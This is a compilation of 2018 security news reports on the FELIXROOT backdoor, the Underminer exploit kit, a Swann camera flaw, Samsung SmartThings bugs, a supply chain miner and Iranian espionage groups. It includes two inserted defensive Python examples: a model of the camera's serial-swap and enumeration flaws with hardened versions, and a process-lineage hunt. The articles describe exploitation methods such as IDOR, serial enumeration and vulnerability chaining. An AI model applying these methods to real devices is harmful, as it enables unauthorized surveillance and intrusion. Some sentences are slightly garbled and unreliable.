FELIXROOT backdoor

This backdoor implements a broad range of features, including target fingerprinting via Windows Management Instrumentation (WMI) and the Windows registry, remote shell execution, and data exfiltration.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1.

If the backdoor was launched by RUNDLL32.exe with parameter #1 it makes an initial system triage before connecting to the command-and-control (C2). The malicious code uses Windows API to get the system information (i.e. computer name, username, volume serial number, Windows version, processor architecture and so on).

The FELIXROOT backdoor is able to communicate with its Command and Control server via HTTP and HTTPS POST protocols. The traffic to the C2 is encrypted with AES and converted into Base64.

“FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server” continues the analysis.

“Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key.”

The experts believe that this backdoor is a dangerous threat but was involved at the time in massive campaigns.

The FELIXROOT backdoor contains several commands that allow it to execute specific tasks. After executing a command, the malicious code waits for one minute before executing the next one.

“Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine” continues FireEye.

Deletes the LNK file from the startup directory.
Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
Deletes the dropper components from the system.

Further details, including the IoCs, are reported in the analysis published by FireEye.

Underminer Exploit Kit spreading Bootkits and cryptocurrency miners
30.7.2018 securityaffairs Cryptocurrency

New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.
Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by TrendMicro.

“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”

Researchers first noticed the Underminer exploit kit activity on July 17, while it was distributing the payloads mainly to Asian countries, mostly Japan (69.75%) and Taiwan (10.52%).

Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files with a customized format similar to ROM file system format (romfs). According to the experts, this makes it difficult to analyze the malicious code.

The Underminer exploit kit appears to have been created in November 2017, when it only included code for exploiting Flash vulnerabilities and used fileless payloads to deliver and execute the malware.

The Underminer EK includes functionalities also employed by other exploit kits, including:

browser profiling and filtering;
prevention of client revisits;
URL randomization;
asymmetric encryption of payloads.

The EK redirects visitors to a landing page that profiles the user's Adobe Flash Player version and browser type via the user agent.

If the visitor's profile does not match that of a target of interest, the exploit kit does not deliver malicious content and redirects the visitor to a clean website.

The Underminer exploit kit also sets a token in the browser cookie; if the victim has already accessed the landing page, it delivers only an HTTP 404 error message instead of the payloads.

Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:

CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.

All the above flaws have been exploited by other EKs in the past.

Below is the infection flow of Underminer's exploits as described by Trend Micro.

Underminer modus operandi

“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.

Security bug in Swann IoT Camera allowed to access video feeds
30.7.2018 securityaffairs IoT

Security experts have discovered a security glitch in Swann IoT camera that could be exploited by attackers to access video feeds.
Security experts from Pen Test Partners (Andrew Tierney, Chris Wade and Ken Munro) along with security researchers Alan Woodward, Scott Helme and Vangelis Stykas have discovered a security glitch in Swann IoT camera that could be exploited to access video feeds.

The experts reported the issue to the vendor that has patched the vulnerability.

The research team developed a proof-of-concept attack exploiting security flaws in the cloud service used by the IoT camera, Safe by Swann; in this way they were able to access the cameras via their mobile devices.

The experts started investigating the issue after reading a BBC article outlining how a BBC employee had accidentally seen someone else’s footage on the mobile app for their home security camera.

The affected camera model is a battery-powered HD camera that streams video either directly over the local network or via a cloud service.

Swann IoT camera

Experts noticed that the cloud service is provided by Ozvision; when a user logs into the system through Safe by Swann, a request (userListAssets) is made to the server.

The server, in turn, provides a list containing the devices associated with the account.

The researchers analyzed the requests and attempted to manipulate the serial number parameter.

Swann IoT camera request

The experts explained that it is easy to find a serial number associated with the targeted device via the API endpoint and APK.

“After reviewing the API endpoint and APK, I quickly realised that the serial number (swnxxxxxxxxx) is the primary identifier of the camera on the platform. This is both for the Swann-specific web API and the OzVision peer-to-peer tunnel. The serial is easily found in the mobile app:” states the analysis published by the experts.

“We replace the serial number (deviceid) in the response from the server. At this point the mobile app sees the details of someone else’s camera. We are using Charles here, but Burp or MITMproxy will do it too”

The experts demonstrated that it is possible to access the camera stream for another serial number.

“In the app, one simply presses ‘play’. This made a request to deviceWakeup using the modified serial, then the Ozvision tunnel to the device was established using the modified serial. We could then watch the camera live.” the experts continue.

The experts explained that Swann quickly fixed the issue, but they speculated that Ozvision had already been aware of it.

“Ozvision already knew about the vulnerability, as Swann had informed them. The Swann customer camera cloud environment had quickly been fixed. Swann took swift action to fix the flaw and had a constructive dialogue with us.” continues the post.

“We suspect they knew about this issue for about nine months, and only fixed it when pressured by Swann; and we are confident the vulnerability was present in at least one other major camera brand to which they provide a cloud service. Further, they initially deflected direct questions about the issue back to Swann.”

How to discover serial numbers of existing cameras?

The serial number is composed of the string ‘swn’ plus 9 hex chars. The researcher Vangelis Stykas (@evstykas, of Tapplock API vulnerability fame) analyzed the API and discovered that it was possible to enumerate them with the following request:

1.1/osn/AccountAddDevice – this will throw an error if the camera is already paired, which means that this trick can be used to enumerate the entire keyspace in search of existing cameras.

“We believe the keyspace could be fully enumerated in as little as 3 days, given a distributed set of concurrent requests to the API.” concluded the researchers.

“So, one could now access arbitrary cameras.”
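The two server-side defects described above (a deviceWakeup that trusts a client-supplied serial, and an AccountAddDevice whose error reveals whether a serial is already paired) can be modelled in a few lines. The following is an added example, not Pen Test Partners' or Swann's code: the endpoint names follow the article, while the account store, the claim codes and the response strings are hypothetical, and the hardened pairing design (proof of possession plus a uniform failure response) is an assumption, not the vendor's fix.

```python
"""Added example, not Pen Test Partners' or Swann's code: a toy model of the
cloud flow described in the article. Endpoint names follow the article; the
account store, claim codes and response strings are hypothetical."""
import re
from dataclasses import dataclass, field

# The article gives the serial format as 'swn' followed by 9 hex characters.
SERIAL_RE = re.compile(r"^swn[0-9a-f]{9}$")


class Forbidden(Exception):
    """Raised when an account asks for a device it does not own."""


@dataclass
class Cloud:
    # constructed sample state: account -> owned serials; serial -> claim code
    owners: dict = field(default_factory=dict)
    claim_codes: dict = field(default_factory=dict)

    def user_list_assets(self, account: str) -> list:
        """userListAssets: devices paired to the calling account."""
        return sorted(self.owners.get(account, set()))

    def device_wakeup_vulnerable(self, account: str, serial: str) -> str:
        """Pre-fix behaviour as the article describes it: the server acts on
        whatever serial the client supplies, so a serial swapped into the
        proxied userListAssets response is honoured and a tunnel is opened."""
        return f"tunnel:{serial}"

    def device_wakeup(self, account: str, serial: str) -> str:
        """Hardened: check the format, then require that the serial is paired
        to the authenticated account before waking it or opening a tunnel.
        Ownership comes from server-side state, never from the request."""
        if not SERIAL_RE.match(serial):
            raise ValueError("malformed serial")
        if serial not in self.owners.get(account, set()):
            raise Forbidden("serial is not paired to this account")
        return f"tunnel:{serial}"

    def account_add_device_vulnerable(self, account: str, serial: str) -> str:
        """AccountAddDevice as described: errors only when the camera is
        already paired, so the response alone reveals which serials exist."""
        for owned in self.owners.values():
            if serial in owned:
                raise ValueError("already paired")
        self.owners.setdefault(account, set()).add(serial)
        return "ok"

    def account_add_device(self, account: str, serial: str, claim_code: str) -> str:
        """Hardened (hypothetical design): pairing requires a claim code that
        only the physical owner has, and every failure returns the same
        generic response, so paired and unpaired serials look identical."""
        if not SERIAL_RE.match(serial):
            return "pairing failed"
        already_paired = any(serial in owned for owned in self.owners.values())
        if already_paired or self.claim_codes.get(serial) != claim_code:
            return "pairing failed"
        self.owners.setdefault(account, set()).add(serial)
        return "ok"


def demo() -> dict:
    """Walk the scenario from the article with constructed serials."""
    cloud = Cloud(
        owners={"alice": {"swn000000001"}, "bob": {"swn000000002"}},
        claim_codes={"swn000000001": "ALICE-CODE", "swn000000002": "BOB-CODE",
                     "swn000000003": "NEW-CODE"},
    )
    out = {}
    out["alice_assets"] = cloud.user_list_assets("alice")
    # Alice's client swaps Bob's serial into the response: the old server obeys.
    out["vuln_tunnel"] = cloud.device_wakeup_vulnerable("alice", "swn000000002")
    try:
        cloud.device_wakeup("alice", "swn000000002")
        out["fixed_tunnel"] = "opened"
    except Forbidden:
        out["fixed_tunnel"] = "refused"
    # The old pairing endpoint answers differently for a serial that exists.
    try:
        cloud.account_add_device_vulnerable("alice", "swn000000002")
        out["vuln_add"] = "ok"
    except ValueError:
        out["vuln_add"] = "already paired"
    # The hardened endpoint gives the same answer for a taken serial and for a
    # free one whose claim code the caller does not have.
    out["fixed_add_taken"] = cloud.account_add_device("alice", "swn000000002", "guess")
    out["fixed_add_free"] = cloud.account_add_device("alice", "swn000000003", "guess")
    out["fixed_add_owner"] = cloud.account_add_device("alice", "swn000000003", "NEW-CODE")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Rate limiting per source on the pairing endpoint is still worth adding on top of the uniform response, since the article's three-day estimate rests on unthrottled concurrent requests.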

Mysterious snail mail from China sent to US agencies includes Malware-Laden CD
30.7.2018 securityaffairs

Several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden CDs
Crooks and cyberspies attempt to exploit any available attack vector to compromise targeted computers, and the case we are going to discuss demonstrates it.

The popular security expert Brian Krebs reported that several U.S. state and local government agencies have reported receiving suspicious letters via snail mail containing malware-laden compact discs (CDs).

The list of recipients that received the malicious snail mail includes State Archives, State Historical Societies, and a State Department of Cultural Affairs.

KrebsOnSecurity reported having learned that the strange mail is apparently sent from China.

“This particular ruse, while crude and simplistic, preys on the curiosity of recipients who may be enticed into popping the CD into a computer. According to a non-public alert shared with state and local government agencies by the Multi-State Information Sharing and Analysis Center (MS-ISAC), the scam arrives in a Chinese postmarked envelope and includes a “confusingly worded typed letter with occasional Chinese characters.”” reads the post published by Brian Krebs.

Snail Mail Malware-Laden CD

The attackers clearly attempt to exploit the curiosity of the potential victims that may be enticed into seeing the content of the CD.

According to the experts at MS-ISAC who analyzed the CDs, the discs contain Mandarin-language Microsoft Word documents, some of which include malicious scripts.

All the letters received by the organizations appear to be addressed specifically to them.

“It’s not clear if anyone at these agencies was tricked into actually inserting the CD into a government computer.” continues Krebs.

“I’m sure many readers could think of clever ways that this apparent mail-based phishing campaign could be made more effective or believable, such as including tiny USB drives instead of CDs, or at least a more personalized letter that doesn’t look like it was crafted by someone without a mastery of the English language.”

A similar attack technique had already been observed in the wild: in September 2016, police in the Australian state of Victoria warned the local population about malware-laden USB drives left in letterboxes.

In August 2016, at Black Hat USA, security researcher Elie Bursztein demonstrated the dangers of found USB drives and how to create a realistic one.

The expert dropped 297 USB drives in six different locations on the University of Illinois Urbana-Champaign campus; the devices were capable of taking over the PC of any unaware user who found one.

48 percent of the USB drives were picked up by passers-by and plugged into a computer, and the unaware users also tried to open the files on them.

Social engineering attacks demonstrate that humans are the weakest link in the security chain, and attacks leveraging malware-laden CDs exploit this bad habit.

Tens of flaws in Samsung SmartThings Hub expose smart home to attack
30.7.2018 securityaffairs
Vulnerability  IoT

Cisco Talos researchers found tens of flaws in the Samsung SmartThings Hub controller that potentially expose smart home devices to attack
Cisco Talos researchers have discovered 20 vulnerabilities in the Samsung SmartThings Hub controller that potentially expose any supported third-party smart home device to cyber attack.

“Cisco Talos recently discovered several vulnerabilities present within the firmware of the Samsung SmartThings Hub.” reads the analysis published by Talos.

“These vulnerabilities could allow an attacker to execute OS commands or other arbitrary code on affected devices.”

The Samsung SmartThings Hub is a central controller that could be used to manage a broad range of internet-of-things (IoT) devices in a smart home, including smart plugs, LED light bulbs, thermostats, and cameras.

Access to those IoT devices could allow attackers to gather sensitive information managed by the devices within the home and to perform unauthorized activities.

The Samsung SmartThings Hub runs a Linux-based firmware and communicates with IoT devices over several wireless standards, including Zigbee, Z-Wave and Bluetooth.

Talos researchers explained that in order to exploit the flaws, the attacker needs to chain a number of existing vulnerabilities together.

“It is possible to gather the set of preconditions needed to exploit bugs that would otherwise be unreachable by using multiple vulnerabilities.” researchers said.

“This is commonly referred to as “chaining.” When considering the severity of vulnerabilities, it is essential to keep in mind that they might be used as part of a chain, as this would significantly elevate their severity.”

The experts identified three notable chains; only one of them is a remote code execution (RCE) vulnerability that can be exploited without prior authentication.

RCE Chain – CVE-2018-3911

This RCE chain attack affects the “video core” HTTP server of the hub and could be exploited by attackers to inject HTTP requests into this process from the network. The flaw is an exploitable HTTP header injection bug in the communications (via port 39500) between the hub and the remote servers, and it could be triggered by sending specially crafted HTTP requests to vulnerable devices.

“This vulnerability is present within the JSON processing performed by the `hubCore` binary present within the SmartThings hub and could be combined with other vulnerabilities present within affected devices to achieve code execution.” states the report.

Samsung SmartThings Hub

Other chains

Other chains identified by the researchers could be exploited only by an authenticated attacker.

The first attack chain is a remote code execution that could be obtained by exploiting the CVE-2018-3879 flaw that allows authorized attackers to execute SQL queries against a database running in the IoT device.

Experts noticed that by chaining this flaw with a string of other memory corruption vulnerabilities (CVE-2018-3880, CVE-2018-3906, CVE-2018-3912 to CVE-2018-3917, and CVE-2018-3919) that affect the Samsung SmartThings Hub, it is possible to execute arbitrary code in the network.

Experts highlighted that CVE-2018-3879 can also be exploited in the final chain attack, for remote information leakage. The vulnerability can be used to create an empty file inside the device.

“Remote information leakage: TALOS-2018-0556 can also be used to create an empty file anywhere inside the device. As described in TALOS-2018-0593, the existence of an empty file at path “/hub/data/hubcore/stZigbee” will make the “hubCore” process crash. Moreover, as described in TALOS-2018-0594, when the “hubCore” process crashes, it triggers an information leak that can be captured from the network.” reads the analysis published by Talos.

“By chaining these 3 vulnerabilities in order, an attacker can obtain a memory dump of the `hubCore` process, which contains most of the core logic, and consequent sensitive information, of the Hub.”

Talos experts tested and confirmed that the Samsung SmartThings Hub STH-ETH-250 – Firmware version 0.20.17 is affected by the flaws.

Samsung has addressed the flaws and security updates have been pushed out automatically.

“Talos recommends that these devices are updated as quickly as possible. As Samsung pushes updates out to devices automatically, this should not require manual intervention in most cases. It is important to verify the updated version has actually been applied to devices to ensure that they are no longer vulnerable. Samsung has released a firmware update that resolves these issues. An advisory related to these vulnerabilities can be found here.” concludes Talos.

Microsoft Uncovers Multi-Tier Supply Chain Attack
28.7.2018 securityweek Attack

Microsoft has shared details of a new attack that attempted to spread crypto-mining malware to a large number of users by compromising the software supply partner of an application developer.

The multi-tier attack relied on compromising the shared infrastructure between a PDF editor vendor and one of its partners that provided additional font packages for the application: the attackers aimed at the supply chain of the supply chain.

Limited in nature, Microsoft said the compromise appeared to be active between January and March 2018, and could have impacted six other vendors working with the font package provider.

Carried out silently, the attack initially appeared as a typical infection and was automatically blocked, but the same infection pattern was observed across a large number of machines.

Windows Defender ATP eventually alerted on nearly 70,000 incidents involving a coin mining process masquerading as pagefile.sys, launched by a service named xbox-service.exe, Microsoft’s Windows Defender ATP Research team explains.

Microsoft's investigation revealed that a malicious installer package (MSI) was being downloaded by a PDF editor during installation, along with other legitimate installers. It was then discovered that the application vendor itself hadn’t been compromised, but the malicious package was served by a partner that creates and distributes additional font packages used by the app.

The attackers discovered a weakness in the interactions between the app vendor and its partner and also found a way to leverage it to hijack the installation chain of the MSI font packages, thus turning the PDF editor into the unexpected carrier of the malicious payload.

Microsoft discovered that the attackers had created a replica of the software partner’s infrastructure on their own server and copied and hosted all MSI files, including font packages, there. They only modified an Asian fonts package to add the malicious payload to it.

The attackers also managed to influence the download parameters used by the PDF app so as to point to their server, which resulted in the download of MSI font packages from the rogue server. Thus, users ended up installing the coin miner malware along with the legitimate application.

At device restart, the malicious MSI file would be replaced with the legitimate version. Microsoft also discovered hardcoded PDF app names in the malicious package and concluded that at least six additional vendors might have been targeted by the attackers.

“While we were not able to find evidence that these other vendors distributed the malicious MSI, the attackers were clearly operating with a broader distribution plot in mind,” Microsoft says.

Detected as Trojan:Win64/CoinMiner, the malicious miner would hide behind the name xbox-service.exe and use the infected machine’s resources to mine for Monero. The malware also attempts to prevent remote cleaning and remediation by blocking communication with the update servers of certain PDF apps.

The threat also hinted at browser scripts as an alternative form of coin mining, but it’s unclear whether this was a secondary plan or work in progress.

“This new supply chain incident did not appear to involve nation-state attackers or sophisticated adversaries but appears to be instigated by petty cybercriminals trying to profit from coin mining using hijacked computing resources,” Microsoft says.

A CrowdStrike report published earlier this week highlighted the increasing number of cyberattacks targeting the software supply chain. Some of the largest such incidents include the NotPetya and CCleaner incidents last year, which impacted millions.
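What made this case visible was not a single alert but the same odd process lineage (an image named pagefile.sys started by a service called xbox-service.exe) recurring across a large fleet. The following is an added example, not Microsoft's code or Windows Defender ATP's logic: a small hunt over constructed process-creation records that flags images named after files Windows never executes, and then keeps only lineages seen on several hosts. The record fields, the parent allowlist and the sample events are hypothetical.

```python
"""Added example, not Microsoft's code or Windows Defender ATP logic: a fleet
hunt over constructed process-creation records for the lineage described in
the article (pagefile.sys launched by xbox-service.exe). Field names, the
allowlist and the sample records are hypothetical."""
from collections import defaultdict
from dataclasses import dataclass
import ntpath

# Windows files that live on disk but are never legitimately run as a process image.
NEVER_EXECUTABLE = {"pagefile.sys", "hiberfil.sys", "swapfile.sys"}

# Parents a defender expects to spawn background work (constructed allowlist; in
# practice this would be scoped to service-hosted processes to keep noise down).
EXPECTED_PARENTS = {"services.exe", "svchost.exe", "msiexec.exe", "explorer.exe"}


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str         # full path of the new process
    parent_image: str  # full path of the process that started it


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any OS via ntpath)."""
    return ntpath.basename(path).lower()


def classify(ev: ProcEvent) -> list:
    """Names of the per-event rules that fire, in a fixed order."""
    hits = []
    if _name(ev.image) in NEVER_EXECUTABLE:
        hits.append("image_masquerades_as_system_file")
    if _name(ev.parent_image) not in EXPECTED_PARENTS:
        hits.append("unexpected_parent")
    return hits


def fleet_hunt(events, min_hosts: int = 3) -> dict:
    """Aggregate hits by (image name, parent name) and keep only the pairs seen
    on at least `min_hosts` distinct hosts: one machine with a strange lineage
    is a ticket, the same lineage on many machines is a supply chain signal."""
    hosts_by_pair = defaultdict(set)
    rules_by_pair = defaultdict(set)
    for ev in events:
        hits = classify(ev)
        if not hits:
            continue
        pair = (_name(ev.image), _name(ev.parent_image))
        hosts_by_pair[pair].add(ev.host)
        rules_by_pair[pair].update(hits)
    return {
        pair: {"hosts": len(hosts), "rules": sorted(rules_by_pair[pair])}
        for pair, hosts in hosts_by_pair.items()
        if len(hosts) >= min_hosts
    }


# Constructed sample telemetry: three affected hosts plus benign activity and
# one single-host oddity that stays below the fleet threshold.
SAMPLE_EVENTS = [
    ProcEvent("ws-01", r"C:\ProgramData\pagefile.sys", r"C:\ProgramData\xbox-service.exe"),
    ProcEvent("ws-02", r"C:\ProgramData\pagefile.sys", r"C:\ProgramData\xbox-service.exe"),
    ProcEvent("ws-03", r"C:\ProgramData\pagefile.sys", r"C:\ProgramData\xbox-service.exe"),
    ProcEvent("ws-01", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\services.exe"),
    ProcEvent("ws-04", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe"),
    ProcEvent("ws-05", r"C:\Temp\updater.exe", r"C:\Temp\launcher.exe"),
]

if __name__ == "__main__":
    for pair, info in fleet_hunt(SAMPLE_EVENTS).items():
        print(pair, info)
```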

Iranian Hackers Use QUADAGENT Backdoor in Recent Attacks
28.7.2018 securityweek CyberSpy

A series of recent attacks attributed to an Iran-linked cyber-espionage group delivered a PowerShell backdoor onto compromised machines, Palo Alto Networks has discovered.

The attacks, observed between May and June 2018, were attributed to the OilRig group, which is also known as APT34 and Helix Kitten. Active since around 2015, the actor was seen using two new backdoors (RGDoor and OopsIE) earlier this year, as well as a new data exfiltration technique.

Aimed at a technology services provider and a government entity in the Middle East, the new attacks were “made to appear to have originated from other entities in the same country” and employed the QUADAGENT backdoor, Palo Alto Networks reveals.

Both the backdoor and other attack artifacts have been previously associated with the OilRig group.

The samples were nearly identical to each other, but featured different command and control (C&C) servers and randomized obfuscation (performed with the open-source toolkit called Invoke-Obfuscation).

Between May and June, the actor launched three attacks, each involving a spear phishing email appearing to originate from a government agency based in the Middle East. The account was likely compromised via credential theft.

The first two attack waves (aimed at a technology services provider) targeted email addresses that weren’t easily discoverable via search engines. The emails contained an attached exe file (converted from .bat) that was designed to install the QUADAGENT backdoor and execute it.

The dropper would run silently, download the backdoor, create a scheduled task for persistence, and then execute the payload. The malware used rdppath[.]com as the C&C and would attempt to connect to it via HTTPS, then HTTP, then via DNS tunneling.

The third wave (against the government entity) also used a simple PE file attachment, but compiled using the Microsoft .NET Framework instead of being converted. The victim was served a fake error box when executing the malware, in an attempt to reduce suspicion. Once dropped and executed, the backdoor would connect to the C&C at cpuproc[.]com.

A third sample collected by Palo Alto Networks did not use a PE attachment but relied on a Word document containing a malicious macro for delivery. The document displayed a decoy image and asked the user to enable content, but did not use additional decoy content after execution.

The use of Word documents as a delivery mechanism has been associated with the threat actor before, and the delivery of QUADAGENT in this manner was previously documented by ClearSky Cyber Security. The sample ClearSky analyzed appears identical with the one used in the attacks against the technology services provider, Palo Alto Networks says.

“While [OilRig’s] delivery techniques are fairly simple, the various tools we have attributed as part of their arsenal reveal sophistication. In this instance, they illustrated a typical behavior of adversary groups, wherein the same tool was reused in multiple attacks, but each had enough modifications via infrastructure change, additional obfuscation, and repackaging that each sample may appear different enough to bypass security controls,” the security firm concludes.

Iran-Linked 'Leafminer' Espionage Campaign Targets Middle East
28.7.2018 securityweek CyberSpy

A group of cyberspies believed to be operating out of Iran has targeted government and other types of organizations in the Middle East since at least early 2017, Symantec revealed on Wednesday.

According to the security firm, which tracks the threat actor as Leafminer, this is a previously undocumented campaign. Symantec has detected malware and tools associated with this group on 44 systems in Saudi Arabia, Lebanon, Israel, Kuwait and other countries, but researchers uncovered a list – written in Iran’s Farsi language – of more than 800 targets whose systems were apparently scanned by the attackers. This list shows that the targeted countries also include the United Arab Emirates, Qatar, Bahrain, Egypt and Afghanistan.

A significant percentage of targets were in the financial, government and energy sectors, but several other industries were targeted as well.

Leafminer targets

Leafminer has used both custom-built malware and publicly available tools in its campaign. Its attack techniques include the use of compromised web servers as watering holes, scanning and exploitation of vulnerable network services, and dictionary attacks aimed at authentication services.

One of the servers used by Leafminer stored 112 files, including malware, tools and log files generated as a result of scans and post-compromise activities.

Some of the tools in Leafminer’s arsenal were linked to other groups with apparent ties to Iran. The hackers have also leveraged widely available tools and exploits, such as the Inception Framework leaked by Shadow Brokers, which includes the infamous EternalBlue exploit.

Leafminer has also developed its own malware, including Trojan.Imecab and Backdoor.Sorgu. Sorgu provides the attackers remote access to compromised machines, while Imecab provides persistent access with a hardcoded password.

Another custom tool used by the threat actor is a modified version of the popular Mimikatz post-exploitation tool. The attackers attempt to avoid detection using a technique dubbed Process Doppelgänging, which researchers disclosed late last year. Symantec has also seen attempts to find systems vulnerable to Heartbleed attacks.

Leafminer also appears to be inspired by the Russia-linked Dragonfly group. A technique used by Dragonfly in watering hole attacks has also been spotted in the Leafminer campaign, researchers said.

Symantec pointed out that the group is “eager to learn from and capitalize on tools and techniques used by more advanced threat actors” and that it has been “tracking developments in the world of cyber security.”

“However, Leafminer’s eagerness to learn from others suggests some inexperience on the part of the attackers, a conclusion that’s supported by the group’s poor operational security. It made a major blunder in leaving a staging server publicly accessible, exposing the group’s entire arsenal of tools,” Symantec said.

Google Announces New Security Tools for Cloud Customers
28.7.2018 securityweek Security

Google on Wednesday took the wraps off a broad range of tools to help cloud customers secure access to resources and better protect data and applications.

To improve security and deliver flexible access to business applications on user devices, Google has introduced context-aware access, which brings elements from BeyondCorp to Google Cloud.

With context-aware access, Google explains that organizations can “define and enforce granular access to GCP APIs, resources, G Suite, and third-party SaaS apps based on a user’s identity, location, and the context of their request.” This should increase security posture and decrease complexity for users, allowing them to log in from anywhere and any device.

The new capabilities are now available for select VPC Service Controls customers and should soon become available for those using Cloud Identity and Access Management (IAM), Cloud Identity-Aware Proxy (IAP), and Cloud Identity.

For increased protection against credential theft, Google announced Titan Security Key, “a FIDO security key that includes firmware developed by Google to verify its integrity.” Meant to protect users from the potentially damaging consequences of credential theft, Titan Security Keys are now available to Google Cloud customers and will soon arrive in Google Store.

Also revealed on Wednesday, Shielded VMs were designed to ensure that virtual machines haven’t been tampered with and allow users to monitor and react to any changes in the VM baseline or its current runtime state. Shielded VMs can be easily deployed on websites.

According to Google, organizations running containerized workloads should also ensure that only trusted containers are deployed on Google Kubernetes Engine. For that, the Internet giant announced Binary Authorization, which allows for the enforcing of signature validation when deploying container images.

Coming soon to beta, the tool allows for integration with existing CI/CD pipelines “to ensure images are properly built and tested prior to deployment” and can also be combined with Container Registry Vulnerability Scanning to detect vulnerable packages in Ubuntu, Debian and Alpine images before deployment.

Google also announced the beta availability of geo-based access control for Cloud Armor, a distributed denial of service (DDoS) and application defense service. The new capability allows organizations to control access to their services based on the geographic location of the client.

Cloud Armor, however, can also be used for “whitelisting or blocking traffic based on IP addresses, deploying pre-built rules for SQL injection and cross-site scripting, and controlling traffic based on Layer 3-Layer 7 parameters of your choice.”

Cloud HSM, a managed cloud-hosted hardware security module (HSM) service coming soon in beta, allows customers to host encryption keys and perform cryptographic operations in FIPS 140-2 Level 3 certified HSMs and to easily protect sensitive workloads without having to manage an HSM cluster.

Courtesy of tight integration with Cloud Key Management Service (KMS), Cloud HSM makes it “simple to create and use keys that are generated and protected in hardware and use it with customer-managed encryption keys (CMEK) integrated services such as BigQuery, Google Compute Engine, Google Cloud Storage and DataProc,” Google says.

Earlier this year, the search company launched Asylo, an open source framework and software development kit (SDK) meant to “protect the confidentiality and integrity of applications and data in a confidential computing environment.”

With Access Transparency, Google logs the activity of Google Cloud Platform administrators who are accessing content. While GCP’s Cloud Audit Logs no longer provide visibility into the actions of administrators when the cloud provider’s Support or Engineering team is engaged, Access Transparency captures “near real-time logs of manual, targeted accesses by either support or engineering.”

Google also announced the investigation tool for G Suite customers, to help identify and act upon security issues within a domain. With this tool, admins can “conduct organization-wide searches across multiple data sources to see which files are being shared externally” and then perform bulk actions on limiting files access.

Google is also making it easier to move G Suite reporting and audit data from the Admin console to Google BigQuery. Furthermore, there are five new container security partner tools in Cloud Security Command Center to help users gain more insight into risks for containers running on Google Kubernetes Engine.

To meet customer requirements on where their data is stored, Google announced data regions for G Suite, a tool that allows G Suite Business and Enterprise customers “to designate the region in which primary data for select G Suite apps is stored when at rest—globally, in the U.S., or in Europe.”

To these, Google adds the Password Alert policy for Chrome Browser, which allows IT admins to “prevent their employees from reusing their corporate password on sites outside of the company’s control, helping guard against account compromise.”

Tenable Soars on IPO Day
28.7.2018 securityweek IT

Tenable Holdings, parent of veteran cybersecurity firm Tenable Network Security, celebrated its much-anticipated initial public offering (IPO) by raising roughly $250 million through the sale of 10.9 million shares at $23 per share.

The Columbia, Md.-based company began trading on the Nasdaq Global Select Market on Thursday under the ticker symbol “TENB”.

Joe Brantuck of Nasdaq with Tenable CEO Amit Yoran

Shares of the company jumped more than 45% in early trading, reaching nearly $34 per share at the time of publishing, pushing the company’s market cap above $3 billion.

Founded in 2002, Tenable is known for its vulnerability scanners and software solutions that help find network security gaps. The company has more than 24,000 customers across 160 countries, including more than 50 percent of Fortune 500 companies and nearly 30 percent of Global 2000 firms.

In late 2017, Tenable announced a partnership with Siemens that aims to provide asset discovery and vulnerability management solutions for industrial networks.

Before going public, Tenable had raised more than $300 million, including $250 million in November 2015 and $50 million in September 2012.

Currently led by CEO Amit Yoran, former President of RSA and former National Cybersecurity Director at the U.S. Department of Homeland Security, Tenable had revenue of $187.7 million in 2017 and reported a net loss of $41 million for the year.

Senator Urges Federal Agencies to Ditch Adobe Flash
28.7.2018 securityweek BigBrothers

United States Senator Ron Wyden on Wednesday sent a letter to national agencies demanding a collaboration on ending the government use of Adobe Flash.

Set to reach an end-of-life status in 2020, Adobe’s Flash Player is continually plagued by critical vulnerabilities. Two zero-days in the software were patched this year alone, but not before threat actors had exploited them in targeted attacks.

Immediately after Adobe announced plans to kill off the plugin a year ago, Apple, Facebook, Google, Microsoft and Mozilla outlined plans to completely remove support for Flash from their products as well.

Sent to National Institute of Standards and Technology (NIST) Director Walter G. Copan, National Security Agency Director General Paul M. Nakasone, and Department of Homeland Security Secretary Kirstjen Nielsen, Senator Wyden’s letter (PDF) requests the end of government use of Flash by August 2019.

Senator Wyden cites not only the looming end of technical support for Flash, but also the inherent security vulnerabilities in the plugin as the main reason to dispose of it.

“Flash is widely acknowledged by technical experts to be plagued by serious, largely unfixable cybersecurity issues that could allow attackers to completely take control of a visitor’s computer, reaching deep into their digital life,” the letter reads.

The United States Computer Emergency Readiness Team (US-CERT) warned about the risks of using Flash nearly a decade ago, the letter also notes.

“The U.S. government should begin transitioning away from Flash immediately, before it is abandoned in 2020,” Senator Wyden says. He also noted that the federal government has previously failed to transition from decommissioned software, as was the case with Windows XP, which cost millions for premium support after its end-of-life in 2014.

The three agencies, he says, provide the majority of cybersecurity guidance to government agencies, so they should ensure that federal workers are protected from cyber threat.

